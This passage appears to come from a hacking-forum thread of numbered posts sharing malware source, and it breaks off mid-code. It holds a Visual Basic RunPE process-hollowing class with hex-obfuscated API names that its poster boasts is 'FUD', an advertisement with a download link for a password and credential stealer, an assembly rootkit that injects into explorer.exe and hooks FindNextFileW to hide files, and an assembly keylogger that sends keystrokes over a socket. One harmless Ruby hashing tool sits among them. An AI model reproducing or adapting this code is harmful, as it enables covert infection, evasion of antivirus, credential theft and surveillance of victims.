        MinorVersion As Integer
        lpName As Long
        Base As Long
        NumberOfFunctions As Long
        NumberOfNames As Long
        lpAddressOfFunctions As Long
        lpAddressOfNames As Long
        lpAddressOfNameOrdinals As Long
    End Type

    Private Type IMAGE_SECTION_HEADER
        SecName As String * 8
        VirtualSize As Long
        VirtualAddress As Long
        SizeOfRawData As Long
        PointerToRawData As Long
        PointerToRelocations As Long
        PointerToLinenumbers As Long
        NumberOfRelocations As Integer
        NumberOfLinenumbers As Integer
        Characteristics As Long
    End Type

    Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long)

    Private c_lKrnl As Long
    Private c_lLoadLib As Long
    Private c_bInit As Boolean
    Private c_lVTE As Long
    Private c_lOldVTE As Long
    Private c_bvASM(&HFF) As Byte

    Public Function zDoNotCall() As Long
        'This function will be replaced with machine code laterz
        'Do not add any public procedure on top of it
    End Function

    Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean
        Dim i As Long
        Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER
        Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS
        Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER
        Dim tSTARTUPINFO As STARTUPINFO
        Dim tPROCESS_INFORMATION As PROCESS_INFORMATION
        Dim tCONTEXT As CONTEXT
        Dim lKernel As Long
        Dim lNTDll As Long
        Dim lMod As Long

        If Not c_bInit Then Exit Function

        Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER)
        If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then
            Exit Function
        End If

        Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS)
        If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then
            Exit Function
        End If

        'kernel32
        lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC
        'ntdll
        lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC

        If sHost = vbNullString Then
            sHost = Space(260)
            'GetModuleFileNameW
            lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC
            Invoke lMod, App.hInstance, StrPtr(sHost), 260
        End If

        With tIMAGE_NT_HEADERS.OptionalHeader
            tSTARTUPINFO.cb = Len(tSTARTUPINFO)
            'CreateProcessW
            lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC
            Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
            'NtUnmapViewOfSection
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
            'VirtualAllocEx
            lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
            'NtWriteVirtualMemory
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
            For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
                CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)
                Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
            Next i
            tCONTEXT.ContextFlags = CONTEXT_FULL
            'NtGetContextThread
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
            'NtWriteVirtualMemory
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
            tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
            'NtSetContextThread
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
            'NtResumeThread
            lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC
            Invoke lMod, tPROCESS_INFORMATION.hThread, 0
            hProc = tPROCESS_INFORMATION.hProcess
        End With
        RunPE = True
    End Function

    Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long
        Dim lPtr
As Long Dim i As Long Dim sData As String Dim sParams As String If lMod = 0 Then Exit Function For i = UBound(Params) To 0 Step -1 sParams = sParams & "68" & GetLong(CLng(Params(i))) Next lPtr = VarPtr(c_bvASM(0)) lPtr = lPtr + (UBound(Params) + 2) * 5 lPtr = lMod - lPtr - 5 sData = THUNK_APICALL sData = Replace(sData, PATCH1, sParams) sData = Replace(sData, PATCH2, GetLong(lPtr)) Call PutThunk(sData) Invoke = PatchCall End Function Private Function GetLong(ByVal lData As Long) As String Dim bvTemp(3) As Byte Dim i As Long CpyMem bvTemp(0), lData, &H4 For i = 0 To 3 GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2) Next End Function Private Sub PutThunk(ByVal sThunk As String) Dim i As Long For i = 0 To Len(sThunk) - 1 Step 2 c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2)) Next i End Sub Private Function PatchCall() As Long CpyMem c_lVTE, ByVal ObjPtr(Me), &H4 c_lVTE = c_lVTE + &H1C CpyMem c_lOldVTE, ByVal c_lVTE, &H4 CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4 PatchCall = zDoNotCall CpyMem ByVal c_lVTE, c_lOldVTE, &H4 End Function Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc) End Function Public Function LoadLibrary(ByVal sLib As String) As Long LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar)) End Function Public Property Get Initialized() As Boolean Initialized = c_bInit End Property Public Sub Class_Initialize() Call PutThunk(THUNK_KERNELBASE) c_lKrnl = PatchCall If Not c_lKrnl = 0 Then c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW") If Not c_lLoadLib = 0 Then c_bInit = True End If End If End Sub Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER) If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If 
Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If Dim lVAddress As Long Dim lVSize As Long Dim lBase As Long With tIMAGE_NT_HEADERS.OptionalHeader lVAddress = lMod + .DataDirectory(0).VirtualAddress lVSize = lVAddress + .DataDirectory(0).Size lBase = .ImageBase End With Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY) Dim i As Long Dim lFunctAdd As Long Dim lNameAdd As Long Dim lNumbAdd As Long With tIMAGE_EXPORT_DIRECTORY For i = 0 To .NumberOfNames - 1 CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4 If StringFromPtr(lBase + lNameAdd) = sProc Then CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2 CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4 GetProcAddress = lFunctAdd + lBase If GetProcAddress >= lVAddress And _ GetProcAddress <= lVSize Then Call ResolveForward(GetProcAddress, lMod, sProc) If Not lMod = 0 Then GetProcAddress = GetProcAddress(lMod, sProc) Else GetProcAddress = 0 End If End If Exit Function End If Next End With End Function Private Function ResolveForward( _ ByVal lAddress As Long, _ ByRef lLib As Long, _ ByRef sMod As String) Dim sForward As String sForward = StringFromPtr(lAddress) If InStr(1, sForward, ".") Then lLib = LoadLibrary(Split(sForward, ".")(0)) sMod = Split(sForward, ".")(1) End If End Function Private Function StringFromPtr( _ ByVal lAddress As Long) As String Dim bChar As Byte Do CpyMem bChar, ByVal lAddress, 1 lAddress = lAddress + 1 If bChar = 0 Then Exit Do StringFromPtr = StringFromPtr & Chr$(bChar) Loop End Function Private Function nlfpkgnrj(ByVal sData As String) As String Dim i As Long For i = 1 To Len(sData) Step 2 nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2))) Next i End Function That modded version uses Native APIs (Thanks Slayer ) and loads APIs on runtime... Of course, its FUD... ALL CREDITS FOR COBEIN!!! 
BTW, it's a class module (*.cls)
  18. by E0N

struct IMAGE_DOS_HEADER
  e_magic    dw ? ; Magic number
  e_cblp     dw ? ; Bytes on last page of file
  e_cp       dw ? ; Pages in file
  e_crlc     dw ? ; Relocations
  e_cparhdr  dw ? ; Size of header in paragraphs
  e_minalloc dw ? ; Minimum extra paragraphs needed
  e_maxalloc dw ? ; Maximum extra paragraphs needed
  e_ss       dw ? ; Initial (relative) SS value
  e_sp       dw ? ; Initial SP value
  e_csum     dw ? ; Checksum
  e_ip       dw ? ; Initial IP value
  e_cs       dw ? ; Initial (relative) CS value
  e_lfarlc   dw ? ; File address of relocation table
  e_ovno     dw ? ; Overlay number
  e_res0     dw ? ; Reserved words
  e_res1     dw ?
  e_res2     dw ?
  e_res3     dw ?
  e_oemid    dw ? ; OEM identifier (for e_oeminfo)
  e_oeminfo  dw ? ; OEM information; e_oemid specific
  e_res20    dw ? ; Reserved words
  e_res21    dw ?
  e_res22    dw ?
  e_res23    dw ?
  e_res24    dw ?
  e_res25    dw ?
  e_res26    dw ?
  e_res27    dw ?
  e_res28    dw ?
  e_res29    dw ?
  e_lfanew   dd ? ; File address of new exe header
ends

struct IMAGE_FILE_HEADER
  Machine              dw ?
  NumberOfSections     dw ?
  TimeDateStamp        dd ?
  PointerToSymbolTable dd ?
  NumberOfSymbols      dd ?
  SizeOfOptionalHeader dw ?
  characteristics      dw ?
ends

struct IMAGE_DATA_DIRECTORY
  VirtualAddress dd ?
  Size           dd ?
ends

struct IMAGE_OPTIONAL_HEADER
  ; Standard fields.
  Magic                       dw ?
  MajorLinkerVersion          db ?
  MinorLinkerVersion          db ?
  SizeOfCode                  dd ?
  SizeOfInitializedData       dd ?
  SizeOfUnitializedData       dd ?
  AddressOfEntryPoint         dd ?
  BaseOfCode                  dd ?
  BaseOfData                  dd ?
  ; NT additional fields.
  ImageBase                   dd ?
  SectionAlignment            dd ?
  FileAlignment               dd ?
  MajorOperatingSystemVersion dw ?
  MinorOperatingSystemVersion dw ?
  MajorImageVersion           dw ?
  MinorImageVersion           dw ?
  MajorSubsystemVersion       dw ?
  MinorSubsystemVersion       dw ?
  W32VersionValue             dd ?
  SizeOfImage                 dd ?
  SizeOfHeaders               dd ?
  CheckSum                    dd ?
  SubSystem                   dw ?
  DllCharacteristics          dw ?
  SizeOfStackReserve          dd ?
  SizeOfStackCommit           dd ?
  SizeOfHeapReserve           dd ?
  SizeOfHeapCommit            dd ?
  LoaderFlags                 dd ?
  NumberOfRvaAndSizes         dd ?
  DataDirectory1  IMAGE_DATA_DIRECTORY ?
  DataDirectory2  IMAGE_DATA_DIRECTORY ?
  DataDirectory3  IMAGE_DATA_DIRECTORY ?
  DataDirectory4  IMAGE_DATA_DIRECTORY ?
  DataDirectory5  IMAGE_DATA_DIRECTORY ?
  DataDirectory6  IMAGE_DATA_DIRECTORY ?
  DataDirectory7  IMAGE_DATA_DIRECTORY ?
  DataDirectory8  IMAGE_DATA_DIRECTORY ?
  DataDirectory9  IMAGE_DATA_DIRECTORY ?
  DataDirectory10 IMAGE_DATA_DIRECTORY ?
  DataDirectory11 IMAGE_DATA_DIRECTORY ?
  DataDirectory12 IMAGE_DATA_DIRECTORY ?
  DataDirectory13 IMAGE_DATA_DIRECTORY ?
  DataDirectory14 IMAGE_DATA_DIRECTORY ?
  DataDirectory15 IMAGE_DATA_DIRECTORY ?
  DataDirectory16 IMAGE_DATA_DIRECTORY ?
ends

struct IMAGE_NT_HEADERS
  Signature      dd ?
  FileHeader     IMAGE_FILE_HEADER ?
  OptionalHeader IMAGE_OPTIONAL_HEADER ?
ends
  19. by Exidous [info] Gets IE7, IE8 (Note: Small bug in IE8, only gets 1 password.. Will be fixed soon), Firefox 3.X, msn, few game serial keys, windows key, Pc Information, Pidgin, Yahoo, Trillian, and steam! (Still Adding More In!!!) (Soon, Get logs: MSN, Skype, Aol, and ICQ.. Maybe trillian idk yet) (Pro Version: Skype Spread, MSN Spread, P2P Spread, USB Spread, Bypass XP Firewall, and Bypass UAC.) Screenshots: Note this is the public version, I will soon have private copies for sale! Also, this is the first release.. Please Report Bugs.. ALL THE SPREADING AND BYPASS FEATURES ARE DISABLED IN FREE VERSION! Download: http://www.2shared.com/file/7111098/7fd6afa2/ZH_Stealer_Public_V01.html
  20. Credit to protos, the author of this code

require 'digest/md5'
require 'digest/sha1'
require 'base64'
require 'tk'

root = TkRoot.new() { title "Encripter By pRotos" }

TkLabel.new(root) {
  text "Palabra a Encriptar"
  pack { padx 20; pady 20; side 'top' }
}

palabra = TkVariable.new()
TkEntry.new(root) {
  textvariable(palabra)
  pack()
}

TkLabel.new(root) {
  text " MD5"
  pack("side" => "bottom")
}
md5 = TkText.new(root) { width 25; height 2 }.pack("side" => "bottom")

TkLabel.new(root) {
  text "SHA1"
  pack('side' => 'bottom')
}
sha = TkText.new(root) { width 25; height 2 }.pack("side" => "bottom")

TkLabel.new(root) {
  text "Base64"
  pack('side' => 'bottom')
}
b64 = TkText.new(root) { width 25; height 2 }.pack("side" => "bottom")

TkButton.new(root) {
  text " Encripta"
  command proc {
    amd5  = Digest::MD5.hexdigest(palabra.value)
    asha1 = Digest::SHA1.hexdigest(palabra.value)
    ab64  = Base64.encode64(palabra.value)
    puts " _MD5_", amd5
    puts " _SHA1_", asha1
    puts " _Base64_", ab64
    md5.insert('end', amd5)
    sha.insert('end', asha1)
    b64.insert('end', ab64)
  }
  pack("side" => "top")
}

TkButton.new(root) {
  text " Clear "
  command proc {
    md5.clear
    sha.clear
    b64.clear
  }
  pack("side" => "bottom")
}

Tk.mainloop()
  21. ;------------------------------------------------------------------------------------------------- ; RootKit por Hacker_Zero & YST ; RootKit sin dll que Hookea FindNextFileW en explorer ocultando los archivos que ;comiencen por '#' ;------------------------------------------------------------------------------------------------- include 'C:\fasm\include\win32ax.inc' .code proc start locals ProcessName db "explorer.exe",0 endl stdcall Inyectar,addr ProcessName,FINFuncion-FuncionInyectada,FuncionInyectada,[GetProcAddress] cmp eax,-1 jne salir invoke MessageBoxA,0,"No se encontró el proceso!",0,0 salir: invoke ExitProcess,0 endp proc Inyectar,ProcessName,Tamaño,Funcion,Datos locals struct PROCESSENTRY32 dwSize dd ? cntUsage dd ? th32ProcessID dd ? th32DefaultHeapID dd ? th32ModuleID dd ? cntThreads dd ? th32ParentProcessID dd ? pcPriClassBase dd ? dwFlags dd ? szExeFile rb MAX_PATH ends pInfo PROCESSENTRY32 ? Handle dd ? PID dd ? DirFuncion dd ? hProcess dd ? endl pushad ;Obtenemos el PID del proceso invoke CreateToolhelp32Snapshot,0x00000002,0 mov [Handle],eax mov eax,sizeof.PROCESSENTRY32 mov [pInfo.dwSize], eax BuclePid: invoke Process32Next,[Handle],addr pInfo cmp eax,0 je FinProcBuclePID ;No hay más procesos invoke lstrcmp,addr pInfo.szExeFile,[ProcessName] cmp eax,0 jne BuclePid jmp FinBuclePid FinProcBuclePID: invoke CloseHandle,[Handle] popad mov eax,-1 ret FinBuclePid: invoke CloseHandle,[Handle] push [pInfo.th32ProcessID] pop [PID] ;Lazamos el proceso invoke OpenProcess,PROCESS_CREATE_THREAD+PROCESS_VM_OPERATION+PROCESS_VM_WRITE,FALSE,[PID] mov [hProcess],eax ;Reservamos espacio en el proceso invoke VirtualAllocEx,[hProcess],0,[Tamaño],MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE mov [DirFuncion],eax ;Escribimos los datos en memoria invoke WriteProcessMemory,[hProcess],[DirFuncion],[Funcion],[Tamaño],0 ;Creamos el hilo invoke CreateRemoteThread,[hProcess],0,0,[DirFuncion],[Datos],0,0 popad mov eax,1 ret endp proc FuncionInyectada,pGetProcAddress 
locals BaseKernel32 dd ? OriginalProtection dd ? endl ;Leemos el PEB para obtener la base de KERNEL32.DLL xor eax, eax add eax,[fs:eax+30h] mov eax, [eax + 0ch] mov esi, [eax + 1ch] lodsd mov eax, [eax + 08h] mov [BaseKernel32],eax ;Obtenemos la dirección de FindNextFileA stdcall [pGetProcAddress],[BaseKernel32],'FindNextFileW' mov ebx,eax stdcall [pGetProcAddress],[BaseKernel32],"VirtualProtect" stdcall eax,ebx,7,PAGE_EXECUTE_READWRITE,addr OriginalProtection ;Calculamos el delta offset call delta delta: pop edx sub edx,delta ;edx=delta ;Lo guardamos en la pila push edx ;Guardamos la dirección de FindNextFileW en la variable dirFindNextFileW add edx,dirFindNextFileW mov dword[edx],ebx pop edx mov ecx,edx add ecx,ApiOriginal mov al,byte[ebx] mov byte[ecx],al mov byte[ebx],0xE9 ;0xE9=jmp inc ebx inc ecx mov eax,dword[ebx] mov dword[ecx],eax mov eax,FuncionHook add eax,edx sub eax,ebx sub eax,4 mov dword[ebx],eax ;la dirección a la que saltará add ebx,4 add ecx,4 mov ax,word[ebx] mov word[ecx],ax mov word[ebx],0x9090 ret ;Terminamos, ya hemos modificado el principio de la api, ;cuando el programa llame a FindNextFileW, saltará a FuncionHook ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Contiene los 7 primeros bytes de la Api FindNextFileW y una rutina para saltar a MessageBox+7 ApiOriginal: ;edx=delta ;7 nops que cambiaremos en tiempo de ejecución por los 7 primeros bytes de FindNextFileW nop nop nop nop nop nop nop add edx,dirFindNextFileW ;Obtenemos la dirección de FindNextFileW leyendo mov eax,dword[edx] ;la variable dirFindNextFileW y la guardamos en eax add eax,7 ;Nos desplazamos 7 bytes jmp eax ;Saltamos a FindNextFileW+7 ;-------------------------------------------------------------------------------------------------------------------------------------------- ;Función a la que salta el programa cuando se llama a la API hookeada proc 
FuncionHook,hFindFile,lpFindFileData Volver: ;Obtenemos el delta offset call delta2 delta2: pop edx sub edx,delta2 ;Llamamos a nuestro buffer push [lpFindFileData] push [hFindFile] mov ecx,edx add ecx,ApiOriginal call ecx cmp eax,0 je Retornar mov ebx,[lpFindFileData] add ebx,44 cmp byte[ebx],'#' jne Retornar jmp Volver Retornar: ret endp ;------------------------------------------------------------------------------------------------------------------------------------------- dirFindNextFileW dd ? endp FINFuncion: .end start
  22. include 'C:\fasm\include\win32ax.inc' .data IP db '127.0.0.1',0 nArch db '\Logdrive.dll',0 nFile db '\Regdrive.exe',0 WinPath dd ? Espacio db '\n',0 saltolinea db 13,10,0 hVentana dd ? Rev dd ? ThreadID dd ? hHook dd ? hSock dd ? hArch dd ? hKey dd ? MyPath dd ? ifSock dd 0 fSize dd ? dLeidos dd ? Buffer dd ? regdisposition dd ? regSubKey db "SOFTWARE\Microsoft\Windows\CurrentVersion\Run",0 .code start: ;Creamos un nuevo hilo para el Hook invoke CreateThread,0,4096,Hookear,0,0,[ThreadID] ;Damos tamaño a los registros invoke GlobalAlloc,GPTR,1024h push eax eax eax pop esi ebx edx ;Conexion invoke WSAStartup,200,eax invoke socket,AF_INET,SOCK_STREAM,0 push eax pop [hSock] ;Esi Contiene el Handle de socket mov word[ebx],2 invoke htons,2000 mov word[ebx],2 mov word[ebx+2], AX invoke gethostbyname,IP add eax,32 invoke inet_addr,eax mov dword[ebx+4],eax .BucleConectar: invoke connect,[hSock],ebx,16 cmp eax, 0xFFFFFFFF JE .BucleConectar .BucleRecivir: invoke GlobalAlloc,GPTR,1024h push eax invoke recv,[hSock],eax,1023h,0 mov [Rev],eax pop eax cmp [Rev],0 jng revisar .if dword[eax] = '$Go' mov [ifSock],1 .endif .if dword[eax] = '$Sp' mov [ifSock],0 .endif revisar: cmp [Rev], 0 jne start.BucleRecivir .reiniciar: stdcall dword[closesocket],[hSock] stdcall dword[WSACleanup] jmp start .end start ;Lanzamos el Hook desde un nuevo hilo proc Hookear xor ebx,ebx invoke GetModuleHandleA,ebx invoke SetWindowsHookExA,13,KeyboardHook,eax,ebx mov [hHook],eax invoke GetMessageA,ebx,ebx,ebx,ebx invoke UnhookWindowsHookEx,[hHook] endp ;Proc del Hook donde se detectará la tecla pulsada proc KeyboardHook,nCode,wParam,lParam mov eax,[wParam] cmp eax,WM_KEYDOWN jne siguienteHook mov eax,[lParam] cmp byte[eax],VK_CAPITAL je siguienteHook cmp byte[eax],VK_LSHIFT je siguienteHook cmp byte[eax],VK_RSHIFT je siguienteHook .if byte[eax]=VK_RETURN stdcall EnviarDatos,Espacio jmp siguienteHook .endif .if byte[eax]=VK_BACK stdcall ProcesarTecla,"{BACK}" jmp siguienteHook .endif .if 
byte[eax]=VK_ESCAPE stdcall ProcesarTecla,"{ESC}" jmp siguienteHook .endif .if byte[eax]=VK_TAB stdcall ProcesarTecla,"{TAB}" jmp siguienteHook .endif .if byte[eax]=VK_LCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RCONTROL stdcall ProcesarTecla,"{CTRL}" jmp siguienteHook .endif .if byte[eax]=VK_RMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_LMENU stdcall ProcesarTecla,"{ALT}" jmp siguienteHook .endif .if byte[eax]=VK_SPACE stdcall ProcesarTecla," " jmp siguienteHook .endif .if byte[eax]=VK_DELETE stdcall ProcesarTecla,"{DEL}" jmp siguienteHook .endif .if byte[eax]=VK_RWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_LWIN stdcall ProcesarTecla,"{WIN}" jmp siguienteHook .endif .if byte[eax]=VK_F1 stdcall ProcesarTecla,"{F1}" jmp siguienteHook .endif .if byte[eax]=VK_F2 stdcall ProcesarTecla,"{F2}" jmp siguienteHook .endif .if byte[eax]=VK_F3 stdcall ProcesarTecla,"{F3}" jmp siguienteHook .endif .if byte[eax]=VK_F4 stdcall ProcesarTecla,"{F4}" jmp siguienteHook .endif .if byte[eax]=VK_F5 stdcall ProcesarTecla,"{F5}" jmp siguienteHook .endif .if byte[eax]=VK_F6 stdcall ProcesarTecla,"{F6}" jmp siguienteHook .endif .if byte[eax]=VK_F7 stdcall ProcesarTecla,"{F7}" jmp siguienteHook .endif .if byte[eax]=VK_F8 stdcall ProcesarTecla,"{F8}" jmp siguienteHook .endif .if byte[eax]=VK_F9 stdcall ProcesarTecla,"{F9}" jmp siguienteHook .endif .if byte[eax]=VK_F10 stdcall ProcesarTecla,"{F10}" jmp siguienteHook .endif .if byte[eax]=VK_F11 stdcall ProcesarTecla,"{F11}" jmp siguienteHook .endif .if byte[eax]=VK_F12 stdcall ProcesarTecla,"{F12}" jmp siguienteHook .endif .if byte[eax]=0xBA stdcall isShift cmp ecx,1 je NoBA stdcall ProcesarTecla,"^" jmp siguienteHook NoBA: stdcall ProcesarTecla,"`" jmp siguienteHook .endif .if byte[eax]=0xBB stdcall isShift cmp ecx,1 je NoBB stdcall ProcesarTecla,"*" jmp siguienteHook NoBB: stdcall ProcesarTecla,"+" jmp siguienteHook .endif .if byte[eax]=0xBC 
stdcall isShift cmp ecx,1 je NoBC stdcall ProcesarTecla,";" jmp siguienteHook NoBC: stdcall ProcesarTecla,"," jmp siguienteHook .endif .if byte[eax]=0xBD stdcall isShift cmp ecx,1 je NoBD stdcall ProcesarTecla,"_" jmp siguienteHook NoBD: stdcall ProcesarTecla,"-" jmp siguienteHook .endif .if byte[eax]=0xBE stdcall isShift cmp ecx,1 je NoBE stdcall ProcesarTecla,":" jmp siguienteHook NoBE: stdcall ProcesarTecla,"." jmp siguienteHook .endif .if byte[eax]=0xBF stdcall isShift cmp ecx,1 je NoBF stdcall ProcesarTecla,"Ç" jmp siguienteHook NoBF: stdcall ProcesarTecla,"ç" jmp siguienteHook .endif .if byte[eax]=0xC0 stdcall isShift cmp ecx,1 je NoC0 stdcall ProcesarTecla,"Ñ" jmp siguienteHook NoC0: stdcall ProcesarTecla,"ñ" jmp siguienteHook .endif .if byte[eax]=0xDB stdcall isShift cmp ecx,1 je NoDB stdcall ProcesarTecla,"?" jmp siguienteHook NoDB: stdcall ProcesarTecla,"'" jmp siguienteHook .endif .if byte[eax]=0xDC stdcall isShift cmp ecx,1 je NoDC stdcall ProcesarTecla,"ª" jmp siguienteHook NoDC: stdcall ProcesarTecla,"º" jmp siguienteHook .endif .if byte[eax]=0xDD stdcall isShift cmp ecx,1 je NoDD stdcall ProcesarTecla,"¿" jmp siguienteHook NoDD: stdcall ProcesarTecla,"¡" jmp siguienteHook .endif .if byte[eax]=0xDE stdcall isShift cmp ecx,1 je NoDE stdcall ProcesarTecla,"¨" jmp siguienteHook NoDE: stdcall ProcesarTecla,"´" jmp siguienteHook .endif .if byte[eax]=0x30 stdcall isShift cmp ecx,1 je No0 stdcall ProcesarTecla,"=" jmp siguienteHook No0: stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=0x31 stdcall isShift cmp ecx,1 je No1 stdcall ProcesarTecla,"!" 
jmp siguienteHook No1: stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=0x32 stdcall isShift cmp ecx,1 je No2 stdcall ProcesarTecla,'"' jmp siguienteHook No2: stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=0x33 stdcall isShift cmp ecx,1 je No3 stdcall ProcesarTecla,"·" jmp siguienteHook No3: stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=0x34 stdcall isShift cmp ecx,1 je No4 stdcall ProcesarTecla,"$" jmp siguienteHook No4: stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=0x35 stdcall isShift cmp ecx,1 je No5 stdcall ProcesarTecla,"%" jmp siguienteHook No5: stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=0x36 stdcall isShift cmp ecx,1 je No6 stdcall ProcesarTecla,"&" jmp siguienteHook No6: stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=0x37 stdcall isShift cmp ecx,1 je No7 stdcall ProcesarTecla,"/" jmp siguienteHook No7: stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=0x38 stdcall isShift cmp ecx,1 je No8 stdcall ProcesarTecla,"(" jmp siguienteHook No8: stdcall ProcesarTecla,"8" jmp siguienteHook .endif .if byte[eax]=0x39 stdcall isShift cmp ecx,1 je No9 stdcall ProcesarTecla,")" jmp siguienteHook No9: stdcall ProcesarTecla,"9" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD0 stdcall ProcesarTecla,"0" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD1 stdcall ProcesarTecla,"1" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD2 stdcall ProcesarTecla,"2" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD3 stdcall ProcesarTecla,"3" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD4 stdcall ProcesarTecla,"4" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD5 stdcall ProcesarTecla,"5" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD6 stdcall ProcesarTecla,"6" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD7 stdcall ProcesarTecla,"7" jmp siguienteHook .endif .if byte[eax]=VK_NUMPAD8 stdcall ProcesarTecla,"8" jmp siguienteHook .endif cmp byte[eax],65 ;VK_A jl 
